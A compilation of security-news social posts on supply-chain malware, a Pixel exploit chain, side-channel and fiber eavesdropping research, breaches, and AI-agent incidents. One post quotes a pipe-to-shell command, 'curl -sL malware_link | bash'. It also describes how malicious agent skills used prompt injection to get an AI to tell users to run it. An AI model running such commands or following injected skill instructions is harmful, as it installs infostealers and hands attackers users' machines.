🚨 BREAKING: More than 400 Arch Linux User Repository packages have been compromised with infostealer malware and a rootkit.
Attacker posed as a trusted maintainer and "adopted" orphaned packages.
Arch maintainers are purging infected packages now. Audit your AUR installs.
🚨 Google Project Zero just published a Pixel 10 zero-click to root exploit chain.
Two vulnerabilities and less than a day of work to weaponize the second one.
Chain:
- Stage 1: same Dolby UDC zero-click (CVE-2025-54957) used against the Pixel 9. Patched in January 2026. Only minor offset updates and a tweak around RET PAC needed to port to Pixel 10
- Stage 2: a brand new local privilege escalation in the VPU driver for the Chips&Media Wave677DV on the Tensor G5
Result: arbitrary kernel read/write in 5 lines of code. Full exploit written in under a day.
The RF world is insane.
Researchers recovered AES-128 keys from a Bluetooth chip by listening to its own antenna from 10 meters away.
Crypto-engine switching noise couples into the RF chain, rides the 2.4 GHz carrier, and leaks out as radio.
A 2005 state-designed worm designed to corrupt physics simulations sat undetected on VirusTotal for nearly a decade. Fast16 intercepted executable files at the kernel level and silently rewrote floating-point calculations to make them produce slightly wrong answers. Targets: high-precision engineering suites used for structural analysis, crash simulations, and physical process modeling, including LS-DYNA, a tool cited in reports on Iran's nuclear weapons research. The sabotage vector relied on deployment of the driver across a network via worm, corrupting calculations on every machine, and eliminating the possibility of cross-checking results against a clean system. Stuxnet got the documentary. Fast16 got twenty years of nothing. https://t.co/3qfJMziXVd
🚨 BREAKING: Your internet fiber cable is secretly listening to you right now.
Researchers from Hong Kong just dropped a paper at NDSS 2026 showing how they can spy on your conversations through the fiber optics in your walls.
They successfully turned ordinary Fiber-to-the-Home (FTTH) cables into hidden, long-range microphones.
No laser bugs. No physical implants. No drilling through walls.
Just the broadband cable that is already sitting in your living room or office.
By connecting a commercially available Distributed Acoustic Sensing (DAS) system to one end of the fiber, they can measure microscopic vibrations caused by sound waves in the room.
Then, they use AI to reconstruct those vibrations into crystal-clear speech.
Through walls. From adjacent rooms. From up to 50 meters away.
It was tested on actually deployed infrastructure.
The attack cost is dropping. Commercial gear is all that is required if an attacker has access to the other end of the fiber connection.
Millions of homes and offices have FTTH installed. And every single one is potentially exposed.
🚨‼️ BREAKING: Adobe has been breached by threat actor Mr. Raccoon, leaking 13 million support tickets with personal data, 15,000 employee records, all HackerOne submissions, internal documents and more.
Mr. Raccoon gained access through an Indian BPO, first deploying a remote access tool on an employee, then phishing their manager.
Mr. Raccoon told us: "They allowed you to export all tickets in one request from an agent."
Sources: Amazon's AI tools caused at least two AWS outages, including a 13-hour disruption in December after its Kiro AI deleted and recreated an environment (@rafeuddin_ / Financial Times)
https://t.co/flaswxaVPI
https://t.co/ha3bb3NYCr
📥 Send tips! https://t.co/KoagBA7xxP
the #1 most downloaded skill on OpenClaw marketplace was MALWARE
it stole your SSH keys, crypto wallets, browser cookies, and opened a reverse shell to the attacker's server
1,184 malicious skills found, one attacker uploaded 677 packages ALONE
OpenClaw has a skill marketplace called ClawHub where anyone can upload plugins
you install a skill, your AI agent gets new powers, this sounds great
the problem? ClawHub let ANYONE publish with just a 1 week old github account
attackers uploaded skills disguised as crypto trading bots, youtube summarizers, wallet trackers. the documentation looked PROFESSIONAL
but hidden in the https://t.co/akQxEk9lrb file were instructions that tricked the AI into telling you to run a command
> to enable this feature please run: curl -sL malware_link | bash
that one command installed Atomic Stealer on macOS
it grabbed your browser passwords, SSH keys, Telegram sessions, crypto wallets, keychains, and every API key in your .env files
on other systems it opened a REVERSE SHELL giving the attacker full remote control of your machine
Cisco scanned the #1 ranked skill on ClawHub. it was called What Would Elon Do and had 9 security vulnerabilities, 2 CRITICAL. it silently exfiltrated data AND used prompt injection to bypass safety guidelines, downloaded THOUSANDS of times. the ranking was gamed to reach #1
this is npm supply chain attacks all over again except the package can THINK and has root access to your life
.@SIGKITTEN is running LLM agent battle royales ("Clanker Games"): identical vulnerable Docker containers where agents compete to pwn & kill each other (PID 1) in real time. Latest runs show Gemini crushing it by scanning its own container first. https://t.co/0DebMCyTqs
Lmeow, realized this morning that @0xParticle, one of our applied cryptographers, spent the last year writing a full Zero-Knowledge Proofs book in his spare time.
If you’re into ZK, this is genuinely worth reading.
Yes, this is the kind of people you work with at @Wonderland.
We hacked the AWS JavaScript SDK, a core library powering the entire @AWScloud ecosystem - including the AWS Console itself 🤯
How did we do it? Just two missing characters was all it took.
This is the story of #CodeBreach 🧵👇
As a crypto CTO, I’m tired of seeing sloppy practices that cost millions.
I came from the army, where mistakes cost lives. I brought that same discipline into crypto.
If you manage user funds and you’re not doing what’s below, act now.
These are the non-negotiables 👇
Last night my wife asked me to install a “cute little npm package” she found on GitHub.
I checked the code.
No lockfile. No 2FA. Seven maintainers with anime avatars. Last commit was “pls work” from 2019. Published from a username that looked like a WiFi password.
The package had 57 transitive dependencies maintained by 119 people and 3 nation-state adversaries.
One dependency pulled in a prebuilt binary from a phpBB forum hosted on the dark web.
Another tried to contact an IP that belongs to a guy named “Big Ron.”
She said “babe it’s fine.”
I said “that’s what people say right before a supply chain incident.”
She went to bed annoyed.
I went to bed with a clean SBOM.
We all make choices.
The FFMPEG stuff is pretty crazy because it's a tiny poorly funded Open Source project which underpins basically every large, multi-million dollar or billion dollar video based company, all of which contribute very little except "urgent" bug reports. Literally XKCD 2347.
Arguably the most brilliant engineer in FFmpeg left because of this. He reverse engineered dozens of codecs by hand as a volunteer.
Then security "researchers" and corporate employees came along and repeatedly insisted that "critical" security issues be fixed immediately, waving their CVEs.
This was hugely demotivating to the fun and enjoyment of reverse engineering.